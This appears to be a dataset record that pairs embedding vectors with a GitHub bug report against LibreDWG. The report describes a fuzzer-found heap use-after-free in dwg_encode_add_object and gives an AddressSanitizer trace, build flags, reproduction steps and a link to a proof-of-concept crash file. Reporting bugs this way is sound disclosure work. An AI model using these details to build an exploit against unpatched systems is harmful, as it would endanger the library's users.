0.02176686003804207, 0.02278955653309822, 0.027626637369394302, 0.007946631871163845, 0.007960451766848564, -0.0005476265796460211, -0.01459416188299656, -0.00026215246180072427, 0.0050651137717068195, -0.006581883877515793, -0.006336574908345938, -0.006426406092941761, -0.0013034202856943011, -0.006713176146149635, -0.014760004356503487, 0.04599371924996376, 0.0023114331997931004, 0.016266409307718277, 0.02278955653309822, -0.008195395581424236, -0.0025550147984176874, -0.006813372485339642, -0.012341463938355446, 0.010074947029352188, 0.008077923208475113, -0.014469779096543789, -0.027875401079654694, 0.0018363628769293427, 0.003911124542355537, 0.012002868577837944, 0.008250676095485687, -0.008644552901387215, 0.011132193729281425, 0.009466856718063354, -0.011671182699501514, -0.026023490354418755, 0.011118373833596706, 0.025111354887485504, -0.0033479502890259027, 0.008257586508989334, 0.007566574960947037, 0.02932652458548546, -0.01062084548175335, 0.009432305581867695, -0.031869448721408844, 0.03269866108894348, 0.01621112786233425, -0.008706743828952312, -0.013882420025765896, 0.012092700228095055, 0.019403601065278053, 0.001196313533000648, 0.002010843250900507, 0.006253653671592474, -0.016528993844985962, -0.0032529362943023443, -0.012327644042670727, -0.013101576827466488, -0.005407164338976145, 0.017772814258933067, 0.013191408477723598, -0.00003455057230894454, -0.00021237804321572185, 0.021974163129925728, 0.022969219833612442, 0.006395310629159212, 0.01099399197846651, -0.018491465598344803, -0.0020350287668406963, -0.03167596459388733, 0.00364854047074914, 0.005006378050893545, 0.0016299232374876738, -0.012769890949130058, -0.003206293098628521, -0.021310793235898018, -0.012693880125880241, 0.00023602359578944743, 0.020992927253246307, -0.020080791786313057, -0.003814383177086711, -0.0003297420043963939, 0.015133149921894073, -0.027350232005119324, 0.02863551303744316, 0.005237866658717394, 0.001548729371279478, -0.011477699503302574, 0.0013060115743428469, -0.011843935586512089, -0.0073178112506866455, 0.013136127032339573, -0.002147318096831441, -0.0005722438218072057, -0.0021352253388613462, 0.00896241795271635, -0.0031302818097174168, 0.015865622088313103, -0.0033375851344317198, -0.011539891362190247, -0.00123604666441679, -0.006554243620485067, 0.014234835281968117, -0.012686969712376595, 0.01715090312063694, 0.013108487240970135, 0.0011704006465151906, -0.0012878725538030267, -0.019721467047929764, 0.007462923415005207, -0.01952798292040825, -0.0001599043607711792, -0.020992927253246307, 0.004526124801486731, 0.010793598368763924, 0.0017042069230228662, 0.002460000803694129, -0.01162281259894371, 0.0017966297455132008, 0.037508100271224976, -0.0006607796531170607, 0.012507307343184948, -0.012009778991341591, -0.012507307343184948, 0.017192363739013672, 0.002373624360188842, 0.007677136920392513, 0.0003688273427542299, -0.012210171669721603, 0.021020567044615746, 0.02173922024667263, -0.013882420025765896, -0.025180457159876823, -0.012507307343184948, 0.008789665065705776, -0.027847761288285255, 0.012071969918906689, 0.02653483860194683, 0.036872368305921555, 0.01001275610178709, -0.016584273427724838, 0.006087810732424259, 0.022098544985055923, -0.028055064380168915, -0.00032088844454847276, -0.004819804802536964, -0.013606014661490917, 0.009024608880281448, 0.0009665522375144064, 0.010627755895256996, 0.019735286012291908, -0.004792164079844952, -0.0039940462447702885, -0.007145058363676071, -0.004311911296099424, -0.006512782536447048, 0.04350607842206955, -0.007773878518491983, -0.008112474344670773, -0.0007950950530357659, 0.026479557156562805, 0.005486630834639072, -0.010302980430424213, -0.013702756725251675, -0.011304946616292, 0.027046186849474907, 0.02327326498925686, -0.005773400422185659, 0.017731353640556335, 0.0020056606736034155, -0.014041352085769176, -0.008927867747843266, 0.003247753717005253, -0.0009570508264005184, 0.016846857964992523, 0.0029333436395972967, 0.020840905606746674, -0.01069685723632574, -0.0014701267937198281, 0.007380002178251743, 0.0023252535611391068, -0.005262052174657583, -0.00272604008205235, 0.005186040885746479, -0.02274809591472149, -0.011926857754588127, -0.0022319669369608164, -0.004719607997685671, -0.0034015036653727293, 0.01100781187415123, 0.003189017763361335, 0.024309782311320305, -0.003365225624293089, 0.004729973152279854, 0.010531013831496239, 0.0060809007845819, 0.011118373833596706, -0.027073828503489494, 0.016722476109862328, 0.014829105697572231, -0.0022665176074951887, -0.014760004356503487, 0.007151968311518431, 0.025650344789028168, 0.00031764930463396013, -0.001008876715786755, -0.004463933873921633, 0.01827034167945385, 0.002971349051222205, -0.02254079282283783, 0.0019348319619894028, 0.007497474085539579, -0.0073178112506866455, 0.009459946304559708, -0.03377663716673851, 0.007760058157145977, -0.014994948171079159, -0.013405621983110905, 0.030045177787542343 ]
37
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A heap use after free was discovered in dwg_encode_add_object in src/encode.c:3877. ASAN report: ``` $ ./dwgrewrite ./pocs/tests_64231 ==25674==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f9c6f40599f at pc 0x00000049511f bp 0x7ffc234960f0 sp 0x7ffc234958b8 READ of size 178195 at 0x7f9c6f40599f thread T0 #0 0x49511e in __asan_memmove (/root/fuzz/dwgrewrite+0x49511e) #1 0x1016996 in memmove /usr/include/x86_64-linux-gnu/bits/string3.h:59:10 #2 0x1016996 in dwg_encode_add_object /root/fuzz/45d2a29/src/encode.c:3877:11 #3 0xfc8b60 in dwg_encode /root/fuzz/45d2a29/src/encode.c:2352:16 #4 0x4c8a03 in dwg_write_file /root/fuzz/45d2a29/src/dwg.c:429:11 #5 0x4c605a in main /root/fuzz/45d2a29/programs/dwgrewrite.c:349:11 #6 0x7f9c7f3b283f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #7 0x41ba18 in _start (/root/fuzz/dwgrewrite+0x41ba18) 0x7f9c6f40599f is located 172447 bytes inside of 138439591-byte region [0x7f9c6f3db800,0x7f9c777e23a7) freed by thread T0 here: #0 0x4955ed in free (/root/fuzz/dwgrewrite+0x4955ed) #1 0x4e36c4 in bit_chain_free /root/fuzz/45d2a29/src/bits.c:3043:7 #2 0x130fd7e in dwg_encode_PLANESURFACE /root/fuzz/45d2a29/src/./dwg.spec:8818:1 #3 0x1035f5e in dwg_encode_variable_type /root/fuzz/45d2a29/src/./classes.inc:243:3 previously allocated by thread T0 here: #0 0x495b89 in realloc (/root/fuzz/dwgrewrite+0x495b89) #1 0x4d508b in bit_chain_alloc /root/fuzz/45d2a29/src/bits.c:3026:30 #2 0x4c8a03 in dwg_write_file /root/fuzz/45d2a29/src/dwg.c:429:11 #3 0x4c605a in main /root/fuzz/45d2a29/programs/dwgrewrite.c:349:11 #4 0x7f9c7f3b283f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-use-after-free (/root/fuzz/dwgrewrite+0x49511e) in __asan_memmove Shadow bytes around the buggy address: 0x0ff40de78ae0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78af0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0ff40de78b30: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==25674==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64231.zip dwgrewrite ./tests_64231 ``` POC file : [tests_64231.zip](https://github.com/LibreDWG/libredwg/files/6621939/tests_64231.zip)
Heap use after free in dwg_encode_add_object in src/encode.c:3877
https://api.github.com/repos/LibreDWG/libredwg/issues/356/comments
2
2021-06-09T07:41:18
2023-06-27T10:21:29Z
https://github.com/LibreDWG/libredwg/issues/356
915,895,718
356
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Heap use after free in dwg_encode_add_object in src/encode.c:3877 Issue date: --- start body --- ## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A heap use after free was discovered in dwg_encode_add_object in src/encode.c:3877. ASAN report: ``` $ ./dwgrewrite ./pocs/tests_64231 ==25674==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f9c6f40599f at pc 0x00000049511f bp 0x7ffc234960f0 sp 0x7ffc234958b8 READ of size 178195 at 0x7f9c6f40599f thread T0 #0 0x49511e in __asan_memmove (/root/fuzz/dwgrewrite+0x49511e) #1 0x1016996 in memmove /usr/include/x86_64-linux-gnu/bits/string3.h:59:10 #2 0x1016996 in dwg_encode_add_object /root/fuzz/45d2a29/src/encode.c:3877:11 #3 0xfc8b60 in dwg_encode /root/fuzz/45d2a29/src/encode.c:2352:16 #4 0x4c8a03 in dwg_write_file /root/fuzz/45d2a29/src/dwg.c:429:11 #5 0x4c605a in main /root/fuzz/45d2a29/programs/dwgrewrite.c:349:11 #6 0x7f9c7f3b283f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #7 0x41ba18 in _start (/root/fuzz/dwgrewrite+0x41ba18) 0x7f9c6f40599f is located 172447 bytes inside of 138439591-byte region [0x7f9c6f3db800,0x7f9c777e23a7) freed by thread T0 here: #0 0x4955ed in free (/root/fuzz/dwgrewrite+0x4955ed) #1 0x4e36c4 in bit_chain_free /root/fuzz/45d2a29/src/bits.c:3043:7 #2 0x130fd7e in dwg_encode_PLANESURFACE /root/fuzz/45d2a29/src/./dwg.spec:8818:1 #3 0x1035f5e in dwg_encode_variable_type /root/fuzz/45d2a29/src/./classes.inc:243:3 previously allocated by thread T0 here: #0 0x495b89 in realloc (/root/fuzz/dwgrewrite+0x495b89) #1 0x4d508b in bit_chain_alloc /root/fuzz/45d2a29/src/bits.c:3026:30 #2 0x4c8a03 in dwg_write_file /root/fuzz/45d2a29/src/dwg.c:429:11 #3 0x4c605a in main /root/fuzz/45d2a29/programs/dwgrewrite.c:349:11 #4 0x7f9c7f3b283f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-use-after-free (/root/fuzz/dwgrewrite+0x49511e) in __asan_memmove Shadow bytes around the buggy address: 0x0ff40de78ae0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78af0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0ff40de78b30: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0ff40de78b80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==25674==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64231.zip dwgrewrite ./tests_64231 ``` POC file : [tests_64231.zip](https://github.com/LibreDWG/libredwg/files/6621939/tests_64231.zip) --- end body ---
4,060
[ -0.04120534658432007, 0.009836011566221714, -0.002543242648243904, -0.0052148508839309216, 0.049870021641254425, 0.02241583541035652, 0.014577514491975307, 0.035813990980386734, -0.0008027862058952451, 0.034434061497449875, -0.0017088665626943111, -0.000668403459712863, 0.029877085238695145, -0.0016677494859322906, 0.004484771750867367, 0.012708190828561783, -0.027903463691473007, 0.0020819290075451136, -0.008287601172924042, -0.040499333292245865, 0.020008981227874756, -0.008099064230918884, 0.0072205630131065845, 0.024036452174186707, -0.00568819884210825, 0.003778761252760887, 0.004697377327829599, 0.015002724714577198, 0.002948396373540163, 0.010421679355204105, -0.023025572299957275, 0.016864025965332985, -0.02203073911368847, 0.0019234777428209782, 0.05936907231807709, 0.014954587444663048, 0.06918903440237045, 0.06630080938339233, 0.003704549977555871, 0.04444657638669014, 0.009402777068316936, -0.06758446991443634, -0.008865246549248695, 0.014858313836157322, -0.00115328433457762, 0.012539710849523544, 0.013077241368591785, -0.01073457021266222, -0.030695414170622826, 0.03401687368750572, -0.011264078319072723, -0.011183849535882473, -0.021822145208716393, -0.046147421002388, 0.00855235569179058, -0.022143058478832245, 0.0028481108602136374, 0.0460832379758358, 0.006245786789804697, 0.020442215725779533, -0.018998103216290474, 0.024132724851369858, 0.0037125726230442524, 0.031545836478471756, -0.00005139636778039858, -0.002854128135368228, -0.008728858083486557, 0.021132180467247963, -0.008319692686200142, -0.027325818315148354, -0.006265843752771616, -0.022046785801649094, 0.0016717608086764812, 0.04386892914772034, 0.05940116196870804, -0.01901414804160595, -0.00037707382580265403, 0.027951600030064583, -0.01073457021266222, 0.019479474052786827, -0.019944798201322556, 0.030342409387230873, -0.013205607421696186, 0.0064142667688429356, 0.014312759973108768, -0.023346485570073128, -0.013293858617544174, -0.05798914283514023, 0.004524886142462492, -0.0267481729388237, -0.008969543501734734, 0.026988858357071877, 0.018998103216290474, -0.011633128859102726, -0.01615801453590393, -0.012291002087295055, -0.048201266676187515, -0.0052148508839309216, -0.049741655588150024, 0.007858378812670708, -0.05038348212838173, -0.005283045116811991, -0.0003432274388615042, 0.031080512329936028, 0.025127558037638664, 0.015716757625341415, 0.01566862128674984, 0.0011663214536383748, 0.01691216230392456, 0.13337181508541107, 0.024870827794075012, 0.005327170714735985, -0.013317926786839962, 0.028529245406389236, -0.011905905790627003, 0.003534064395353198, 0.030101723968982697, 0.012515641748905182, -0.039279863238334656, 0.006987900007516146, -0.011328260414302349, -0.049709562212228775, 0.007774139288812876, -0.002615448320284486, -0.01688007079064846, 0.00930650345981121, -0.003768732538446784, -0.01566862128674984, -0.022175149992108345, 0.00342976744286716, -0.018901828676462173, -0.0775327980518341, 0.003365584649145603, -0.018917875364422798, 0.013959755189716816, 0.01602965034544468, -0.01704052835702896, 0.04447866603732109, 0.011320238001644611, -0.011280124075710773, -0.05105740204453468, -0.03838130459189415, -0.005054393783211708, 0.013590703718364239, -0.007228585425764322, 0.010140879079699516, -0.0064423466101288795, 0.011705334298312664, -0.005551810376346111, -0.011576969176530838, -0.01076666172593832, -0.012427390553057194, 0.005435479339212179, 0.04014632850885391, 0.035749807953834534, -0.013350018300116062, -0.012323093600571156, 0.03494752570986748, -0.02756650373339653, -0.00496614258736372, -0.005279033910483122, -0.04483167082071304, -0.005230896640568972, -0.030663322657346725, -0.028400881215929985, -0.006871568970382214, 0.04868263751268387, 0.02376367524266243, 0.006285901181399822, 0.02933153137564659, 0.01067038718611002, -0.0032071333844214678, 0.0386701263487339, 0.00356415007263422, -0.055871110409498215, -0.012603893876075745, -0.0006328020826913416, 0.011777540668845177, -0.007842333056032658, -0.0114084891974926, -0.00044526802957989275, 0.002727768151089549, 0.001211449969559908, 0.031257014721632004, 0.02203073911368847, -0.010253199376165867, 0.006747214589267969, -0.03401687368750572, 0.006887614727020264, 0.013229675590991974, -0.02471037022769451, -0.019351107999682426, 0.013309904374182224, -0.0073048025369644165, 0.03562144190073013, -0.01845254935324192, -0.035813990980386734, -0.004773594439029694, 0.006546643562614918, -0.004705400206148624, 0.012026248499751091, 0.01062224991619587, -0.014433102682232857, 0.02552870102226734, -0.026700036600232124, 0.0048056854866445065, -0.02238374389708042, 0.030374500900506973, 0.007613682188093662, -0.024068541824817657, -0.03258880600333214, -0.03539680317044258, 0.006101375445723534, 0.015853146091103554, -0.0059489416889846325, 0.029491987079381943, 0.00024381934781558812, -0.007794196251779795, -0.03215557336807251, -0.003243236104026437, 0.020602673292160034, -0.026347031816840172, -0.00610538711771369, -0.008833155035972595, -0.05208432674407959, -0.011296169832348824, 0.01996084488928318, 0.001448123948648572, -0.018837645649909973, 0.007060105912387371, 0.03186675161123276, -0.012676099315285683, 0.010878981091082096, -0.0010830843821167946, -0.000043812269723275676, 0.0017951121553778648, -0.013045149855315685, -0.005932895932346582, -0.020249666646122932, -0.018500685691833496, 0.01757003553211689, 0.04088443145155907, -0.019784342497587204, -0.029604308307170868, -0.0056200046092271805, 0.06719937175512314, -0.034690793603658676, -0.008760949596762657, 0.001307724160142243, 0.03366386890411377, 0.025913797318935394, -0.031096557155251503, 0.016085809096693993, -0.02350694313645363, 0.026234712451696396, 0.011970088817179203, 0.028721794486045837, 0.021228455007076263, -0.028336698189377785, -0.023282304406166077, 0.02596193552017212, 0.006679020822048187, -0.02583356946706772, -0.0006859534769318998, 0.003909132443368435, 0.01622219756245613, -0.01851673237979412, -0.007184459827840328, 0.008199349977076054, -0.03308622166514397, 0.05192387104034424, -0.028962479904294014, -0.0270369965583086, -0.054330725222826004, -0.021725870668888092, 0.019752250984311104, 0.006273866631090641, -0.008034882135689259, 0.01216263696551323, -0.017184939235448837, -0.016085809096693993, 0.0008885303395800292, -0.039119403809309006, 0.037514835596084595, 0.0018452549120411277, -0.030230090022087097, 0.015443981625139713, -0.006145501043647528, -0.01668752357363701, -0.012579824775457382, -0.0039231725968420506, 0.016831934452056885, -0.04573022946715355, 0.014056028798222542, 0.004725457169115543, 0.019672023132443428, 0.0012986984802410007, -0.020041072741150856, -0.019688067957758904, -0.024116680026054382, 0.0007847347878850996, -0.01750585250556469, 0.00922627467662096, 0.004673308692872524, -0.03173838555812836, -0.013358041644096375, -0.03170629218220711, 0.021051952615380287, -0.006967843044549227, -0.0013197584776207805, 0.048457998782396317, -0.046532515436410904, -0.010501907207071781, -0.014609605073928833, -0.022865114733576775, -0.028208332136273384, -0.004412566311657429, -0.03164210915565491, 0.01842045783996582, 0.0381566621363163, -0.04191135615110397, -0.010911072604358196, -0.04021051153540611, -0.0038609954062849283, 0.04329128563404083, -0.021196363493800163, -0.011673242785036564, 0.03982541710138321, -0.06106991693377495, 0.014312759973108768, -0.008616538718342781, -0.005916850175708532, -0.0009216245962306857, -0.022576292976737022, -0.045120496302843094, -0.03178652375936508, -0.030262181535363197, 0.013951731845736504, 0.004585057497024536, -0.0017850835574790835, -0.015195272862911224, 0.006109398324042559, -0.003999389708042145, -0.014786108396947384, 0.028112057596445084, 0.002136083086952567, 0.024277137592434883, 0.0039632865227758884, 0.04598696157336235, 0.01582907885313034, 0.0014731953851878643, 0.04152625799179077, 0.0013067212421447039, 0.032989948987960815, -0.007272711489349604, -0.005246942397207022, -0.009723691269755363, -0.0076417624950408936, 0.012523665092885494, -0.010838867165148258, 0.00572029035538435, -0.0010239159455522895, 0.017987223342061043, -0.008584447205066681, 0.025512654334306717, 0.03366386890411377, 0.0028280536644160748, -0.007292768452316523, -0.02350694313645363, -0.01747376285493374, -0.02552870102226734, 0.05625620856881142, -0.02228747121989727, -0.023908086121082306, -0.017345396801829338, -0.03343923017382622, 0.04101279750466347, 0.0268123559653759, -0.02602611668407917, 0.0048217312432825565, 0.015291547402739525, -0.004428612068295479, 0.016575202345848083, -0.031481653451919556, 0.019912708550691605, 0.032957859337329865, -0.02360321767628193, 0.03247648850083351, 0.01299701351672411, -0.05503673478960991, -0.026764219626784325, 0.04117325320839882, -0.02442154847085476, -0.04637205973267555, 0.009747759439051151, 0.04906773567199707, 0.026491442695260048, -0.0002215058048022911, 0.015299570746719837, -0.05529346689581871, -0.011384421028196812, 0.022175149992108345, 0.01992875337600708, 0.011416512541472912, -0.0019385205814614892, 0.054362814873456955, 0.03083982691168785, -0.0009241317748092115, 0.03071146085858345, 0.018532777205109596, 0.029090845957398415, 0.01710471138358116, -0.041975539177656174, 0.018404413014650345, 0.04470330849289894, 0.031610019505023956, -0.011536855250597, -0.0008990603382699192, -0.042135994881391525, 0.014465194195508957, -0.04332337528467178, 0.002765876706689596, -0.00919418316334486, 0.04909982532262802, 0.005439490545541048, 0.012780396267771721, -0.04717434197664261, 0.015235387720167637, 0.022800933569669724, -0.03549307584762573, 0.0004502823285292834, 0.025673111900687218, 0.02052244357764721, 0.02162959612905979, -0.036070723086595535, -0.012074385769665241, -0.023683445528149605, -0.05474791303277016, -0.014778085052967072, 0.028096012771129608, 0.0014070068718865514, 0.012026248499751091, -0.04778407886624336, -0.026988858357071877, 0.01496261078864336, -0.03661627694964409, -0.030037540942430496, -0.0022002658806741238, 0.013462338596582413, -0.03231602907180786, -0.046628791838884354, 0.02347485162317753, -0.002683642553165555, -0.017842812463641167, 0.005002245306968689, -0.013911617919802666, 0.0029844993259757757, 0.0011282128980383277, 0.020955678075551987, 0.005391353741288185, -0.004115720745176077, 0.031545836478471756, -0.031096557155251503, -0.002551265526562929, 0.02540033496916294, 0.054426997900009155, 0.02819228544831276, -0.037643201649188995, -0.0025973969604820013, -0.018966011703014374, -0.00748130539432168, 0.016896117478609085, 0.015299570746719837, -0.01583710126578808, -0.02225537970662117, 0.05465163663029671, -0.0032913731411099434, -0.014457170851528645, -0.0051627024076879025, -0.03356759250164032, 0.007132311351597309, -0.010830843821167946, 0.01148871798068285, -0.02382785640656948, 0.019607840105891228, 0.02146914042532444, 0.021886328235268593, -0.004492794629186392, -0.006133466958999634, -0.006851512007415295, 0.01842045783996582, 0.035878174006938934, -0.023218121379613876, -0.03722601383924484, -0.012034270912408829, 0.0115047637373209, -0.014970633201301098, 0.00024281650257762522, 0.03716183081269264, 0.003993372432887554, 0.028737839311361313, -0.030904008075594902, 0.019479474052786827, -0.02045826055109501, 0.029716627672314644, -0.041975539177656174, -0.045345135033130646, 0.01858091540634632, 0.015885237604379654, -0.02759859524667263, 0.010068673640489578, -0.023089755326509476, 0.004761559888720512, -0.027149315923452377, -0.0030286249238997698, -0.02140495739877224, 0.016278358176350594, 0.00047936514602042735, 0.01416032575070858, 0.014553445391356945, 0.0064423466101288795, -0.029187118634581566, -0.011809631250798702, 0.030695414170622826, 0.009908217005431652, 0.01917460560798645, 0.02012130245566368, -0.0019244805444031954, 0.025753341615200043, -0.02360321767628193, 0.01635056361556053, 0.0006694063195027411, -0.021196363493800163, 0.012780396267771721, -0.007192482706159353, 0.002876190934330225, -0.01075061596930027, 0.0051707252860069275, -0.003524035681039095, -0.02121240831911564, 0.012539710849523544, 0.05064021423459053, -0.052854519337415695, 0.008881292305886745, -0.015098999254405499, 0.01923878863453865, -0.00493405107408762, 0.026266802102327347, -0.010036582127213478, -0.012379254214465618, 0.007344916928559542, -0.005082474090158939, -0.009539165534079075, 0.019126469269394875, -0.01416032575070858, 0.02196655608713627, -0.02530406042933464, 0.003997383639216423, 0.016238244250416756, 0.0042922236025333405, 0.00538333086296916, -0.01845254935324192, 0.02118031680583954, -0.024469684809446335, 0.0035681615117937326, -0.01266807597130537, 0.01898205652832985, 0.02002502791583538, -0.03334295377135277, -0.04332337528467178, 0.009755782783031464, -0.011135712265968323, 0.026555625721812248, -0.010461793281137943, -0.01483424473553896, -0.003614292712882161, 0.0010098759084939957, 0.009563234634697437, -0.014296714216470718, -0.03411314636468887, 0.004905971232801676, -0.026395168155431747, -0.00985205639153719, 0.011087574996054173, 0.019848525524139404, -0.0228490699082613, -0.03162606433033943, -0.0008193333051167428, 0.016607293859124184, -0.01491447351872921, 0.018757417798042297, 0.01347036100924015, -0.008801063522696495, -0.010566090233623981, -0.005547799170017242, 0.011151758022606373, -0.013478384353220463, -0.007677865214645863, -0.019222741946578026, 0.0014902439434081316, -0.03281344473361969, 0.021709825843572617, 0.004881902597844601, -0.04624369367957115, -0.053111251443624496, -0.017152847722172737, 0.02055453509092331, -0.017120756208896637, -0.034305695444345474, 0.012467505410313606, 0.013751160353422165, 0.024967102333903313, 0.030936099588871002, -0.0032111448235809803, 0.011095598340034485, -0.028047874569892883, 0.0031148705165833235, 0.017987223342061043, -0.029604308307170868, -0.003764721332117915, 0.013767206110060215, -0.03488334268331528, 0.005463559180498123, 0.006518563721328974, 0.022576292976737022, 0.015925351530313492, -0.01848464086651802, -0.0017239094013348222, -0.016527066007256508, 0.00999646820127964, -0.01933506317436695, 0.018308138474822044, 0.013133401051163673, -0.03337504714727402, -0.019479474052786827, 0.03194697946310043, 0.04341965168714523, -0.0009923259494826198, -0.010237153619527817, 0.008223419077694416, -0.0027257625479251146, 0.028593428432941437, -0.034434061497449875, -0.002298545790836215, -0.027261635288596153, 0.010349472984671593, 0.018933920189738274, 0.002452985616400838, 0.02979685552418232, 0.017120756208896637, -0.04341965168714523, -0.015780940651893616, 0.018404413014650345, 0.01753794401884079, 0.018468594178557396, -0.012066362425684929, 0.05654503032565117, 0.015123067423701286, -0.01076666172593832, 0.0020207546185702085, -0.010887004435062408, -0.02451782301068306, -0.04717434197664261, 0.00575238186866045, 0.007288757245987654, -0.00285212229937315, 0.0010319388238713145, -0.005860690027475357, 0.037450652569532394, 0.012411344796419144, -0.004873879719525576, -0.004236063454300165, 0.007730013690888882, 0.003909132443368435, -0.014497285708785057, -0.032011162489652634, -0.013831389136612415, 0.014633674174547195, -0.021549368277192116, 0.019158560782670975, 0.027983691543340683, -0.003050687722861767, 0.009266388602554798, -0.003614292712882161, -0.01864509843289852, 0.01271621324121952, -0.031000282615423203, -0.00088301463983953, -0.030887963250279427, -0.02533615194261074, 0.021019861102104187, -0.015877215191721916, 0.020442215725779533, 0.015034816227853298, 0.01691216230392456, -0.025721250101923943, 0.01750585250556469, -0.030823780223727226, -0.0032853560987859964, 0.005928884260356426, -0.016085809096693993, 0.022239333018660545, 0.0029544136486947536, -0.01502679381519556, 0.0134864067658782, 0.021019861102104187, -0.0060773068107664585, 0.010517952963709831, 0.028304606676101685, 0.001530358218587935, -0.012531687505543232, 0.015740826725959778, -0.03729019686579704, 0.02596193552017212, 0.031513746827840805, 0.003289367537945509, -0.0072205630131065845, 0.016896117478609085, -0.008103076368570328, -0.013221653178334236, -0.03658418357372284, -0.026266802102327347, -0.00794663093984127, -0.04460703209042549, 0.018468594178557396, -0.003295384580269456, -0.005527741741389036, -0.0020197518169879913, 0.010357496328651905, 0.01776258461177349, -0.00017662800382822752, -0.03703346475958824, 0.012515641748905182, 0.018933920189738274, -0.012515641748905182, -0.01489842776209116, 0.02596193552017212, -0.016077786684036255, -0.005932895932346582, 0.010333427228033543, 0.016446838155388832, -0.004909982904791832, 0.02448573149740696, -0.008600492961704731, -0.020041072741150856, 0.004143800586462021, 0.020281758159399033, 0.006237763911485672, -0.03546098619699478, 0.01573280431330204, 0.013125378638505936, 0.004464714787900448, 0.016366608440876007, -0.022544201463460922, -0.013141424395143986, 0.006101375445723534, 0.030984237790107727, -0.02134077437222004, 0.0034698816016316414, -0.017810720950365067, -0.01489842776209116, 0.018805554136633873, -0.0010770673397928476, 0.02015339396893978, 0.01263598445802927, -0.019319016486406326, 0.017313305288553238, -0.009755782783031464, 0.019447382539510727, 0.016896117478609085, 0.024180863052606583, -0.0010224116267636418, -0.0023707514628767967, -0.006807385943830013, 0.026330985128879547, -0.033118315041065216, 0.006526586599647999, 0.02193446457386017, 0.018998103216290474, 0.030502866953611374, -0.030214043334126472, -0.0026074254419654608, -0.0386059433221817, 0.0228490699082613, 0.014786108396947384, 0.0016767751658335328, 0.01296492200344801, -0.014425080269575119, -0.0134864067658782, 0.005547799170017242, -0.01065434142947197, -0.019672023132443428, 0.05365680530667305, -0.01602965034544468, -0.006037192884832621, -0.021485185250639915, -0.008969543501734734, 0.011841722764074802, -0.006959820166230202, -0.036070723086595535, -0.0026214653626084328, -0.0007035034359432757, -0.02150123193860054, -0.06222520396113396, -0.014729947783052921, -0.001847260631620884, -0.010493884794414043, 0.008817109279334545, -0.009635440073907375, 0.01933506317436695, 0.001403998350724578, -0.0003397174587007612, 0.020281758159399033, 0.014481239952147007, -0.004881902597844601, -0.0063982210122048855, 0.006691054906696081, -0.016494974493980408, 0.021100088953971863, -0.018596960231661797, -0.02970058098435402, 0.011111644096672535, 0.0018974035046994686, -0.051121585071086884, -0.03549307584762573, 0.0007957661873660982, 0.018067453056573868, 0.011352329514920712, 0.01776258461177349, 0.028272515162825584, -0.0025492599233984947, 0.0007360962918028235, -0.007858378812670708, -0.011889860033988953, -0.006542632356286049, 